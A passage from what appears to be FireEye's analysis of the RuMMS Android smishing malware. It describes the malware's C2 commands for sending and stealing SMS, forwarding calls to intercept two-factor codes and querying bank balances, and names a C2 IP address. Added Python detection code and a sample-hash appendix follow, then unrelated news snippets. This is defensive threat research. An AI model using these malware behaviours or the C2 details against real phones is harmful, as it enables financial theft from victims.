Method onPostExecute parses the response from the above HTTP session and executes the commands provided by the remote attacker. As seen from the code in Figure 5, the commands RuMMS supports right now include:

  • install_true: to modify app preference to indicate that the C2 server received the victim device’s status.
  • sms_send: to send C2-specified SMS messages to C2-specified recipients.
  • sms_grab: to upload periodically the SMS messages in the inbox to C2 server.
  • delivery: to deliver specified text to all victim’s contacts (SMS worming).
  • call_number: to forward phone calls to intercept voice based two-factor authentication.
  • new_url: to change the URL of the C2 server in the app preference.
  • ussd: to call a C2-specified phone number.

Figure 5. Method onPostExecute: to handle instructions from remote C2

Figure 6 shows an example response sent back from one C2 server. Note that inside this single response, there is one “install_true” command, one “sms_grab” command and four “sms_send” commands. With the four “sms_send” commands, the messages as specified in the key “text” will be sent immediately to the specified short numbers. Our analysis suggests that the four short numbers are associated with Russian financial institutions, presumably where a victim would be likely to have accounts.

Figure 6. Example Response in JSON format

In particular, short number “+7494” is associated with a payment service provider in Russia. The provider’s website described how the code 7494 can be used to provide a series of payment-related capabilities. For example, sending text “Balance” will trigger a response with the victim’s wallet balance. Sending text “confirm 1” will include proof of payment. Sending text “call on” will activate the USSD payment confirmation service.

During our investigation, we observed the C2 server sending multiple “balance” commands to different institutions, presumably to query the victim’s financial account balances. RuMMS can upload responses to the balance inquiries (received via SMS message) to the remote C2 server, which can send back additional commands to be sent from the victim to the provider’s payment service. These could include resetting the user’s PIN, enabling or disabling various alerts and confirmations, and confirming the user’s identity.
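Three things in this report translate directly into detection logic: the shape of the lure URL (an eight-character subdomain of the hosting provider, always ending in /mms.apk), the beacon format (a POST to ".../api/?id=N" whose first field is method=install|info|sms), and the command vocabulary in the JSON response. The following is an added example, not FireEye's code: "XXXX.ru" is kept as the report's own placeholder for the anonymised hosting provider, the C2 address 37.1.207.31 and the subdomain "asdfgjcr" are taken from the report, and the sample SMS, the POST fields and the JSON response are constructed here (Figure 6's exact layout is not reproduced on this page, so the response structure below is an assumption).

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# --- Lure URL pattern (XXXX.ru is the report's placeholder for the provider) ---
HOSTING_DOMAIN = "XXXX.ru"
LURE_RE = re.compile(
    r"h(?:xx|tt)ps?://([a-z0-9]{8})(?:\.|\[\.\])" + re.escape(HOSTING_DOMAIN) + r"/mms\.apk",
    re.IGNORECASE)


def find_lure_urls(sms_text: str) -> list:
    """URLs in an SMS body with the RuMMS lure shape; accepts defanged hxxp / [.] forms."""
    return [m.group(0) for m in LURE_RE.finditer(sms_text)]


# --- Beacon classification ------------------------------------------------------
BEACON_METHODS = {"install", "info", "sms"}


def classify_beacon(url: str, form_fields: dict):
    """Return 'install', 'info' or 'sms' for a POST to http://<c2>/api/?id=<num>
    whose form body carries a matching "method" field, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/api/") or "id" not in parse_qs(parts.query):
        return None
    method = form_fields.get("method")
    return method if method in BEACON_METHODS else None


# --- C2 response triage -----------------------------------------------------------
KNOWN_COMMANDS = {"install_true", "sms_send", "sms_grab", "delivery",
                  "call_number", "new_url", "ussd"}
HIGH_RISK = {"sms_send", "delivery", "call_number", "ussd", "new_url"}


def summarize_c2_response(json_text: str) -> dict:
    """Assumed layout: a JSON list of objects, each with a "command" key and,
    for sms_send, "number" and "text" keys (the report names the "text" key)."""
    summary = {"commands": [], "unknown": [], "sms_targets": [], "high_risk": 0}
    for entry in json.loads(json_text):
        name = entry.get("command")
        if name not in KNOWN_COMMANDS:
            summary["unknown"].append(name)
            continue
        summary["commands"].append(name)
        if name in HIGH_RISK:
            summary["high_risk"] += 1
        if name == "sms_send":
            summary["sms_targets"].append((entry.get("number"), entry.get("text")))
    return summary


# --- Constructed samples -----------------------------------------------------------
SAMPLE_SMS = "You got a photo in MMS format: hxxp://asdfgjcr.XXXX.ru/mms.apk"
SAMPLE_BEACON_URL = "http://37.1.207.31/api/?id=17"          # id value is constructed
SAMPLE_BEACON_FIELDS = {"method": "install", "operator": "op", "model": "model"}
SAMPLE_RESPONSE = json.dumps([                                 # +7494 is from the report,
    {"command": "install_true"},                               # the other numbers are made up
    {"command": "sms_grab"},
    {"command": "sms_send", "number": "+7494", "text": "Balance"},
    {"command": "sms_send", "number": "+7101", "text": "Balance"},
    {"command": "sms_send", "number": "+7102", "text": "Balance"},
    {"command": "sms_send", "number": "+7103", "text": "Balance"},
])

if __name__ == "__main__":
    print(find_lure_urls(SAMPLE_SMS))
    print(classify_beacon(SAMPLE_BEACON_URL, SAMPLE_BEACON_FIELDS))
    print(summarize_c2_response(SAMPLE_RESPONSE))
```

The beacon check is deliberately structural (path, query key, method value) rather than tied to one C2 address, because the report shows several servers in use and new_url lets the operator move again; the lure regex is equally shape-based for the same "moving target" reason.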

RuMMS Samples, C2, Hosting Sites, Infections and Timeline

In total we captured 297 RuMMS samples, all of which attempt to contact an initial C2 server that we extracted from the app package. Figure 7 lists the IP addresses of these C2 servers, the number of RuMMS apps that connect to each of them, and the example URL used as the first parameter of the HttpPost operation (used in the code of Figure 3). This indicates that multiple C2 servers were used in this campaign, but one (37.1.207.31) was the most heavily used.

Figure 7. RuMMS samples and C2 servers

Figure 8 shows how these samples, C2 servers and hosting websites are related to each other, including when they were compiled or observed. In the figure, the smaller boxes in blue-gray represent particular apps in the RuMMS family, while the bigger boxes in deep-blue represent C2 servers used by some RuMMS apps. The dotted arrows represent the use of a particular C2 server by a specific app to send information and fetch instructions. In this figure we have 11 RuMMS samples, all of which were hosted on the website as shown in the "y" axis. The dates on the "x" axis show the dates when we first saw these apps in the wild. This figure demonstrates the following interesting information:

  • The time range when threat actors distributed RuMMS on those shared-hosting websites is from January 2016 to March 2016.
  • Threat actors used different websites to host different payloads at different times. This kind of "moving target" behavior made it harder to track their actions.
  • The same websites have hosted different RuMMS samples at different dates.
  • C2 servers are shared by multiple samples. This matches our observations of C2 servers as shown in Figure 7.

Figure 8. RuMMS samples, hosting sites, C2 servers from Jan. 2016 to Mar. 2016

We do not know exactly how many people have been infected with RuMMS malware; however, our data suggests that there are at least 2,729 infections with RuMMS samples from January 2016 to early April 2016.

Figure 9 shows the number of RuMMS infections recorded in the last four months. When we first observed the malware in January, we recorded 380 infections. In February, we recorded 767 infections. In March, it peaked at 1,169 infections. In April, at the time of writing this post, we recorded 413 RuMMS infections. Although the propagation trend seems to be slowing down a bit, the figure tells us that RuMMS malware is still alive in the wild. We continue to monitor its progress.

Figure 9. RuMMS infections from Jan. 2016 to Apr. 15, 2016

Conclusion

Smishing (SMS phishing) offers a unique vector to infect mobile users. The recent RuMMS campaign shows that Smishing is still a popular means for threat actors to distribute their malware. In addition, the use of shared-hosting providers adds flexibility to the threat actor’s campaign and makes it harder for defending parties to track these moving targets.

Fortunately, the FireEye Mobile Threat Prevention platform can recognize the malicious SMS and networking behaviors used by these RuMMS samples, and help us quickly identify the threat. To protect yourself from these threats, FireEye suggests that users:

  • Take caution before clicking any link whose origin you are not sure about.
  • Don’t install apps outside the official app store.

To detect and defend against such attacks, we advise our customers to deploy our mobile security solution, FireEye MTP/MSM. This helps our clients gain visibility into threats in their user base, and also enables them to proactively hunt down devices that have been compromised. In addition, we advise our customers with NX appliances to ensure that Wi-Fi traffic is scanned by NX appliances to extend coverage to mobile devices.

Appendix: RuMMS Sample Hashes

016410e442f651d43a7e28f72be2e2ef

 01d95061091d4f6f536bada821461c07

 0328121ca8e0e677bba5f18ba193371c

 03a442b0f7c26ef13a928c7f1e65aa23

 03c85cb479fd9031504bba04c2cefc96

 053c247a1c176af8c9e42fe93fb47c9d

 064799b5c74a5bae5416d03cf5ff4202

 066e171fc083c5e21ac58026870a4ae8

 0749e775f963fdab30583914f01486e3

 081b04697f96568356d7b21ac946fb7c

 0927b599d9599dcd13b6ef5f899ef4d9

 0964ee11f6d19c2297bce3cb484a2459

 0a22ceac6a0ee242ace454a39bff5e18

 0a3b9c27b539498b46e93dbdcfb3de1e

 0abf7a57855c2312661fdc2b6245eef8

 0c3dbcffb91d154b2b320b2fce972f39

 0c75764d172364c239fc22c9c3e21275

 0dd1d8d348a3de7ed419da54ae878d37

 0dd40d2f4c90aec333445112fb333c88

 0e89415cdd06656d03ef498fd1dd5e9b

 0e8ef8108418ca0547b195335ee1dd2c

 0ea83ffc776389a19047947aba5b4324

 0f280e86268da04dc2aa65b03f440c1a

 0f5a6b34e952c5c44aa6f4a5538a6f2b

 0fa1ffbcfe0afc6a4a57fed513a72eb6

 104859f80028792fbd3a0a0ea1e6fd78

 10c58dd41d95a81b1043059563860c1c

 11d425602d3c8311d1e18df35db1daa3

 120561bfced94cc1ce5cda03b203dbf8

 128576fbdb7d2980c5a52cd3286bcca8

 14a8246474ed819a4dfcc3cb06e98954

 14c7f0dc55b5dd0c7e39f455baae3089

 1693f424742279a8678322a012222a02

 16b778921b6db27a2af23dd8ce1fac3e

 16ec62c1d7d4ac3f3d7d743fc1e21bf6

 1711081b5ba5c3941ae01d80819c7530

 177af9700bcc8b7c8c131b662e8cdda8

 17bfe26e9a767c83df2aab368085e3c2

 17d083988dd5e6d9c2517899ae30bb02

 1850c020edafcf8254279e352ce33da9

 18d1b845b2ee1960b304ab2fd3bfe11b

 1b4b6bf1e40d5954b34a815d1438efd9

 1cbedd5cc8e9b59f90ec81a5aec0239f

 1cead79dfdaee9d7eb914a5b13a323ea

 1dc8e18e610fd921ffa638b3f51de4b2

 1ed3c0158eb960bb47847596a69a744c

 2177a3094dd06f9d777db64364d3fc2c

 220fc807884acfcd703596994e202f21

 244b965d3816ac828d21c04bcf0519a4

 24f23fe808ba3f90a7a48eae37ce259d

 2745bc6f165ae43f1edf5cd1e01db2c5

 2802552e2aa5491ebbf28bfef85618cb

 29a8eef1b304d53f303d03ba6994ed32

 2a1c02bd4263a4e1cb6f648a9da59429

 2a6c086c589d1b0a7d6d81c4e4c70282

 2ac5e8e2fd8050330863875d5018cb59

 2c200cfcc5f4121fb70b1c152357225b

 2cb75f46b901c17b2f0a9cb486933d65

 2cd1908f4846e81e92f82684d337e858

 2ce248b19c30a9fed4cd813c23831d7a

 2cf5b053bf51e9ff8ea653da5523b5f1

 2e44ffbaa24c1203df218be1cc28a9e5

 2e9fcd26fdeeed19f0de865298d59f2e

 308bec5d52d55c00aff0b561e7975bdf

 30a8c03a7d6a489da047443938e2aa20

 30c1a1a7417598fa8f23572f0f090866

 30f2b0edd191d1465bac11553d60f761

 3103bd49786d52c920e12303921bd2f1

 3131d58ace4f3485dcc2581be3fcfb42

 315a713c65baf5390fcf4232df3d1669

 318513f9f14fbf78ec037b62b221c91b

 3199b7e9b27c1aa619bc6959c6eab458

 31eddefcadb1d4a6bbc55e610d085638

 34788c0c80687e1488d3c9b688de9991

 34e8dfc3d5fe5a936d556ac79e53412f

 356393e8c85864fa2e31e30d28c13067

 35666c9ef8d3d81d8641578259982e57

 37506bcd79e0a39d56edda2f0713ce34

 38b9c800c9787ea6de3f5a9436444435

 391a74f46c7f7c34e98be38228fc94b6

 3a0baa509a54359d10696d995dfe783e

 3abe743871688eb542a36bdd4f5ba196

 3b2dda7dafbc3f690f179999b367f743

 3b39743b98e7223c93f15026c009e2ed

 3d3dac2656f5850d6e2cababc06edd23

 3d4e135e647fba30e67415e5ebc5af42

 3de3c1ff2db0f75d18c10c1d682596a6

 3f9376bd042b5c9b111dde1b460ab9b5

 40f7cec380c6904bbeaac5c42bc99fb6

 412e4f59e3a7a7d870581e83bffa33d1

 41b946bf78606d4f94a7206f024914bf

 422fc3634a8a575945fc96bd85465275

 4294589c588b577529150b01ce588a13

 437db1d8d84e245875064ba7cccc9ae0

 44a56e288d906cbfec85f6715554f83b

 472187a7eba0fd0479130711df34a409

 4827e46a2382fdfa2847db0d376c2c52

 48378433f79ac304d0bb86ee6f99958e

 4841a521f95ea744243566cc69904bd1

 4aa78398d9a927d2c67bf6a5fb0c8db8

 4b478ad35ad285ff4ff2623cb8c63ff7

 4be9cb7e3cdab4766411a0d2506a2cf7

 4d7ce984313b06835b72a4e6ad6e61fa

 4e60269982182b1cb8139dd5159a6b78

 4ed59658844835a222e09c6ca5701bf8

 4eda51773b46975d47b8932fee4cd168

 4f837a3eee0a228c1c7cb13916f14fe8

 4fad9557973f3451be04efbbf9f51b8d

 4faefac63b3876604945f11effc6042a

 5044a06f037118627899abd1229895fe

 50aa9c662a508c9a9bda508bbb5b4ac7

 50cccf3ee065977de3a2c07249313411

 512c580db356e18c51b051a7b04fa0c1

 5144790d272daacc7210fc9e2ae41f12

 516d74358ef2f61fbb90e9d1a17f59f9

 52c5cc858d528fd0554ef800d16e0f8f

 53281564e50a8dfab1d7d068f5f3bae3

 53baf60ae4611b844e54a600f05c9bbf

 5510c69693819baf9ad2e4a346f805b0

 5527ffe6768f3b61d69ee83039f6e487

 5678e4c2cfe9c2bd25cde662b026550e

 56d95aa243571ccd85b516d0f393ed37

 56dedd0ca8849891486e23a53acb66ed

 5702f860032be6a67d5ead51191f90a8

 57343fd964265e6472e87a4f6c626763

 5814b9a4b3f10abe74b61901ee151a9f

 5a95d673b2c2d758c7d456c421ba1719

 5b6c7341a08f5cd4c27f443e3c057dd1

 5b7b1c1d3102a04e88ddfe8f27ffa2f2

 5bc0678baa1f30b89b80dcc7cf4431dc

 5c318b3ba77d0052427c7bffeb02a09f

 5de94bc0c4cc183c0ee5a48a7ae5ae43

 5e47b31cf973beba682c2973ed3dc787

 5e5f6b1fe260475872192d2ec3cb1462

 5e9773741a5e18672664121f8e5f4191

 5f08343486e42a0f8db0c0647c8255d1

 609e0b1940d034b6d222138e312c8dd2

 60b89dc654ed71053466b6c1f9bec260

 6148b71d713c80af2acfd3506d72a7a4

 6179d744808ad893dabb7b7de6b4a488

 619dade7c5a7444397b25c8e9a477e96

 61e67e7f1e2644bb559902ba90e438a5

 62186f41850c54a46252a7291060760d

 64c2cbc4bfd487e30f7b925fbbc751b0

 65eab2ed600f5ae45fe916a573ce72b0

 66e9dca8bb42dd41684c961951557109

 67fe7190cefc9dad506ed3c1734ff708

 692989b9681f80e9051359d15ec2297f

 6ae2e0ed9ae6dca4ea1ba71ae287406c

 6de02d603b741c7a5fc949952088f567

 6e2b5af3acf5306d8ac264a47193fe49

 6ee8919bd388494e5694b39ae24bd484

 6ef671cfdf28c7252db1c451ca37ec9a

 70122f367b82c8dd489b0fafa32d0362

 7064de8a83750bd1b38c23324b3757e3

 7089021c4ac0a7f38d52206653070af9

 7211a069239cb354c6029f963c2a5f06

 73d14b09f12eca5af555e5d205808064

 7511ed572f555af27c47f2a02b64302d

 75aab55e822bbca87f60970d37c8d7b3

 75d87e15a789770c242fec0867359588

 75e18289c8e9cc484e7e43ca656be24a

 76546e44fe4761503cb807a8d96a6719

 766084da85eab06dc639a62ff381b541

 778cc7e83ad27c92f30cea519989f47b

 788f75bf8f1330ec78d5d454bf88d17f

 79736c03eeda35ab7c3b6656048c0247

 7b853f8219384485b8753a58259ad171

 7c3e5bace659e9ddf7444b744a8667e9

 7d1c2d11a9b68a107ffb32c86675d8e9

 7d91f480e5a0c4372a43103f678eb328

 7e0671fc66f9a482000414212bf725e3

 7f79a0ccc91f654de59c361af1964354

 80a80e9f0b241ab3d0d9febab34d0e56

 822c9b26e833e83790433895fe7e2d3b

 836e64f3e9046e08cdf66b944718e48b

 83e4610c9500a48b8d1721c11e5797e2

 84354edd9292441aeed05c548fdaed7c

 84d600d85a061fa137e4b8fc82e1de2f

 851953bee7687d96891f45f24297a50b

 8599910e19552c9aa26db7be3e04be55

 859e9dbcbd0db577ff401537ae560e74

 85d866a99d6b130cbdde3949c015fec4

 86484d0e432e8c7e8f1b213413157138

 8895d772158f5456a80a2093aad516a2

 895a3b66c76c169b02843468062b1c5d

 895ef967c9ee97c5b9f3bdc426f6ad0f

 898683c4f39ad83f53f38460e170fd77

 8a0aae077c62d37ba9aeed2ad441dcf3

 8a5c4d1d946a01b56f180c930438c1e9

 8b56c493375d3b65d509793751509ba5

 8ceb4223e6238955fa7e154a794d5d04

 8d7c7392767415031d9ded205f0b29ef

 8dadd1162d01911160a5dbcdf081c5ba

 8e1207efd35f03caf74fdff314368da9

 8e5e0eb98e813371653b09864d4fc76a

 8f0243b5077bdb23baa1ceeedc697ff0

 8f11770349001409163245422b8d4442

 8f1fa31155a38ce3d6bc0fba43a82362

 90366f0731b60cf0c9959f06509d9ff5

 91a2746500d253633dd953692183fd76

 91c6a4e86d72c60beef95b75f9b4be82

 93323852f58c4e1b436a671651cc4998

 93b8d4d9704c13d983cf99a1296259d2

 940981070911dee2e2818216047d2ecb

 9461365a2bed17fb5b41536bf07ba165

 95921f248cd912e301c6b04120714d1f

 960d7dfa6f9c110732c34025687d5b60

 9621369183946ebb60d9959828dd5e16

 97cbd88d4414b41939571e994add3756

 99236003238f8ee88b5c4c8d02fdd17d

 9ab4cbd602ad8e5434e863bf0d84be2f

 9ba65c06057c179efbc8a62f86f2db71

 9bdb39a159774154fabc23d06ad8d131

 9c3ba2e8d172253e9d8ce30735bfbf78

 9cf27a07e0a4a6f6b1a8958241a6a83f

 9e173831c7f300e9dca9ee8725a34c5a

 9e7d24027621c0ecfd13995f2e098e8c

 9f723da52e774a6c5d03d8ba5f6af51f

 a0c486b879e20d5ac1774736b48e832b

 a152ea9ee04ca9790d195f9f3209b24a

 a1803ced57c1917f642ed407fc006659

 a1c504f51654200e6d0e424f38700f14

 a1d5f30ea6fc30d611c2636da4e763d4

 a1e7602b96d78fc37b5e1d271dbab273

 a2c5ffc33a96c6b10ae9afdaf5d00e62

 a31adc93ea76a4e2dfb6ae199fc0a294

 a3aaff686bf34d60b8319ef2525387d3

 a3ecea301bbe612ef9e17a502ee94b21

 a44b5c01378dd89c1c17565736f6c47b

 a4c8b0199f92f9be7b482df2bcce8162

 a4cba22ecfa33d1a4ad69be4616eeaf7

 a4f19520957bee3d68755a3978fb16be

 a61d0ea6e5711135383a3592e6b31e49

 a639338fd99cfd50292425d36618074c

 a6c5d89df0774fdd1643080548bfe718

 a893d3cfce6e8869b35a8140089ec854

 a8f2d507661b76a94971dcf7d593fc8a

 a9776f2633565419e55f6842a0b74278

 a9ce99d1788c13edaa3fb7f92ebb1240

 aa48cd40fcfe561bb5cd274549c94d6f

 aa5216ce42e1c279042662c018509140

 aa735ae056b57471bbe3499517afd057

 ac6a922fd8c604eb56da5413c2368be7

 ac8ad3eb56d2a94db30d3f4acfe4b548

 acfc48ed626369cf0fb6e1872c92e1bd

 ad75d090f865cbab68c411682ad2eb89

 ad99f483836492e34c072764db219fe4

 addd10c396fb3c1998ea451710f6f6f6

 aea04d46b9a4097155afcb3a80aafb8f

 af60a1f801ee3d5ba256c9354d8e9ca3

 af732879ff0b20eb02386a16581c8a4b

 afbfbb0fc1e7cbf56732d2afaeb21302

 b0737a9732647803bab45e64b4dc8f42

 b11bb0abd2a72e0ca88fe9817d42e139

 b2e0eae1d879287da6155ffa1ffff440

 b371fd7024687fa205135e2f3425822d

 b4298ce2eab75b9729ae3ac54e44e4d1

 b536f2134d75a4ac257071615e227a7d

 b56b456488358fcdc0ce95df7e0309cf

 b57618a7098fa9fcc14b8779b71ba62a

 b5afb1b35f7ee56218ee1c0d6ba92fb7

 b5f1fe0ab8ef34d6429916b6257e682b

 b66eb248e1ca0c35bc7e518fa4d5757a

 b6f52abceb49c6d38e29de6951f768fa

 b7343a1094f139699bc4698343d2b7ad

 b80f53f44e737aa1ecc40a1c5cf10a5d

 b9057cc24a9d4bde42198d3956ee46e6

 b9680d7e427bc2a3ed0320fb15023a88

 ba1c5315933c1a4d446bf90eb9d7c8c6

 bbb20fe1b97f12934b70cb1a7d2399d4

 bbfac3011f9e3b239e4eb9f9d6b82763

 bcd595f9eb7fba9fa82c21805ebb1535

 bd8c50221e6ec939f7b4df54795bca20

 bd9ebb6baf95d25fc54568bb4c37567b

 bddd52910f0c40b538418144ae0b63ac

 bde66ebf8cd08b301b0b6c3140df5fed

 be10e76060c3bbc59c1d87bdc3abeb12

 c23c4130ffebf9ffe60136b7099f8603

 c2eb3eed3f2082cf05e7c785cfab5487

 c36230f577cfa4d25e29be00ada59d91

 c39f6e984efcbf40612a3acb780b638a

 c528caa8cffd76825748507b8b0ad03e

 c5dd6c26c4c1e03fd1ec51cb1dec91ca

 c620fef9ebfa83e84c51134d14d44ec8

0c3dbcffb91d154b2b320b2fce972f39

27660806ff465edbe0f285ab67a9a348

36966643d45c09afb42a40fa6f71b38c

458a8c5f99417f5031885116e40117ae

4aebe1ff92fad7c4dba9f8a26b6a61d3

551f94100c04ed328ddeaf4817734eb5

6fb3c026537a0248f4ef40b98a9f1821

acf114610271e97cb58b172d135564bb

ccabfa1d72797c635eb241f82a892e22

cf5451b8b53092266321a421ba9224ca

d5ea3a22bce77e4bc279ca7903c3288a

d8caad151e07025fdbf5f3c26e3ceaff

eb7d7dacebba8741c2d483f0fcabdc82
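The appendix above is a flat list of MD5 digests with blank lines and leading whitespace between entries, which is how indicator lists are usually pasted around. The following Python is an added example, not the post's or FireEye's code: it parses a list in that layout into a deduplicated indicator set and checks files under a directory against it. The excerpt embedded in the block is constructed from the first three appendix entries (one repeated in upper case to exercise deduplication); the directory layout, file suffix filter and function names are assumptions made for this example.

```python
"""
Added example (not from the FireEye post): turn the appendix's MD5 list into an
indicator set and match files against it. The embedded list is a constructed
excerpt of the appendix; directory layout and suffix filter are assumptions.
"""
import hashlib
import os
import re
from typing import Dict, Iterable, Set

MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def parse_hash_list(text: str) -> Set[str]:
    """Accept the appendix's loose layout (blank lines, leading whitespace,
    mixed case, repeated entries) and return lower-case MD5 strings.
    Anything that is not a 32-digit hex token is rejected rather than
    silently skipped, so a corrupted line cannot hide in the indicator set."""
    hashes: Set[str] = set()
    for line in text.splitlines():
        token = line.strip().lower()
        if not token:
            continue
        if not MD5_RE.match(token):
            raise ValueError(f"not an MD5 hex digest: {line!r}")
        hashes.add(token)
    return hashes


def md5_of_bytes(data: bytes) -> str:
    """MD5 of an in-memory blob (used for small inputs and for testing)."""
    return hashlib.md5(data).hexdigest()


def md5_of_file(path: str, chunk: int = 1 << 16) -> str:
    """Stream a file through MD5 so large APKs are not read into memory at once."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def find_matches(root: str, iocs: Set[str], suffixes: Iterable[str] = (".apk",)) -> Dict[str, str]:
    """Walk root and return {path: md5} for files whose digest is in iocs."""
    wanted = tuple(s.lower() for s in suffixes)
    hits: Dict[str, str] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(wanted):
                continue
            path = os.path.join(dirpath, name)
            digest = md5_of_file(path)
            if digest in iocs:
                hits[path] = digest
    return hits


# Constructed excerpt of the appendix (its first three entries), reproducing the
# leading spaces and blank lines of the extracted page plus one upper-case repeat.
APPENDIX_EXCERPT = """
016410e442f651d43a7e28f72be2e2ef

 01d95061091d4f6f536bada821461c07

 0328121ca8e0e677bba5f18ba193371c
 0328121CA8E0E677BBA5F18BA193371C
"""

if __name__ == "__main__":
    iocs = parse_hash_list(APPENDIX_EXCERPT)
    print(len(iocs), "unique indicators loaded")
    # Assumed layout: APK files collected for triage sit under ./samples
    for path, digest in find_matches("samples", iocs).items():
        print("MATCH", digest, path)
```

Hash matching only catches samples already in the list, so it complements the behavioural checks discussed earlier rather than replacing them; the strict parser matters because an indicator list that silently drops a malformed line produces false negatives with no error.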
22 Mar 10:03

Knowledge of 19/03/2016

The "parable of the talents" is a chapter of the Gospel according to Saint Matthew. It encourages making financial investments and explains the foundations of today's capitalism (take from the poor to give to those who already have a lot).
26 Nov 09:40

GhostSec hacks the Islamic State with Prozac

GhostSec, a group often associated with Anonymous, has just struck hard by hacking one of the Islamic State's sites on the Tor network and replacing the home page with an advertisement for an online pharmacy...

24 Nov 13:50

ProtonMail, the anti-NSA webmail, has recovered from the "biggest cyber-attack in Switzerland"

The hyper-secure Swiss email service ProtonMail suffered a DDoS attack of unprecedented scale in Switzerland. Unavailable for 5 days, it managed to recover, but the attack continues. Prot [...]